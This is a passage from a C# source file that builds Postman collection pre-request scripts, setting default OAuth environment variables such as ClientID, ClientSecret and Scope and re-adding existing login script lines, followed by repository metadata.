return data;
}
JToken Event(JToken data, JToken pEnvironment, List<string> forAddEnviroment)
{
var loginConfig = (JArray)(data[0]["script"].SelectToken("exec")).DeepClone();
((JArray)(data[0]["script"].SelectToken("exec"))).Clear();
//Main Postman Auth Config
((JArray)(data[0]["script"].SelectToken("exec"))).Add($@"pm.environment.set(""{"ApiPath"}"",pm.environment.get(""{"ApiPath"}"") ? pm.environment.get(""{"ApiPath"}"") : ""{pEnvironment["ApiPath"]}"");");
((JArray)(data[0]["script"].SelectToken("exec"))).Add($@"pm.environment.set(""{"AccessTokenURL"}"",pm.environment.get(""{"AccessTokenURL"}"") ? pm.environment.get(""{"AccessTokenURL"}"") : ""{pEnvironment["AccessTokenURL"]}"");");
((JArray)(data[0]["script"].SelectToken("exec"))).Add($@"pm.environment.set(""{"ClientID"}"",pm.environment.get(""{"ClientID"}"") ? pm.environment.get(""{"ClientID"}"") : ""{pEnvironment["ClientID"]}"");");
((JArray)(data[0]["script"].SelectToken("exec"))).Add($@"pm.environment.set(""{"ClientSecret"}"",pm.environment.get(""{"ClientSecret"}"") ? pm.environment.get(""{"ClientSecret"}"") : ""{pEnvironment["ClientSecret"]}"");");
((JArray)(data[0]["script"].SelectToken("exec"))).Add($@"pm.environment.set(""{"Scope"}"",pm.environment.get(""{"Scope"}"") ? pm.environment.get(""{"Scope"}"") : ""{pEnvironment["Scope"]}"");");
//Query Enviroment Data
foreach (var item in forAddEnviroment)
{
((JArray)(data[0]["script"].SelectToken("exec"))).Add($@"pm.environment.set(""{item}"",pm.environment.get(""{item}"") ? pm.environment.get(""{item}"") : '');");
}
//Auto Update Auth Info Code
foreach (var item in loginConfig)
{
((JArray)(data[0]["script"].SelectToken("exec"))).Add(((JValue)item).Value);
((JArray)(data[0]["script"].SelectToken("exec")))[((JArray)(data[0]["script"].SelectToken("exec"))).Count - 1] = item;
}
return data;
}
}
}
| 4255864dcf9c2fe5a56c3be9ff7f30f5ac556bce | [
"Markdown",
"C#"
] | 2 | Markdown | mahmudarslan/PostmanImport | c902e4c7bbf5bdac283a2bbf8c85c1579d19971a | 4377c72b65a2e0a00257527a2892accb7b56b90e |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.